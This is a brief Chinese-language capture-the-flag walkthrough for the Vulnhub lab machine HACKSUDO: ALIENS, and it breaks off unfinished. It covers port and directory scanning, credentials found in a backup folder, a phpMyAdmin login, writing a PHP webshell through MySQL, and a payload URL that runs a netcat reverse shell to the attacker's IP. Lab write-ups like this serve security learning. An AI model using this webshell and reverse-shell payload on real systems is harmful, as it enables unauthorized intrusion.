Vulnhub_HACKSUDO: ALIENS
作者:互联网
Vulnhub下载地址https://www.vulnhub.com/entry/hacksudo-aliens,676/
0x01环境介绍
靶机ip:10.10.13.50
0x02信息收集
利用nmap进行端口漏洞的扫描,发现开放22、80、9000端口
既然有80端口,那下一步就是对80端口上的web页面进行扫描
利用dirmap扫描,发现一个页面
http://10.10.13.50/backup/
页面内容点击下载后,发现几个敏感数据
刚刚扫描出来的还有9000端口,访问了一下是phpmyadmin页面,将刚获得的敏感数据输入后,发现成功登陆
vishal/hacksudo
0x03漏洞检测
发现secure_file_priv为空值即可读可写
利用mysql写入一句话木马
0x04漏洞利用
payload:http://10.10.13.50/alien.php?cmd=nc%2010.10.13.253%20%208989%20%20-e%20/bin/bash
将/bin/bash转发到10.10.13.253的8989端口上
未完,待续……
标签:HACKSUDO,扫描,ALIENS,端口,13.50,Vulnhub,10.10,80,页面 来源: https://www.cnblogs.com/secutity-zbk/p/14854452.html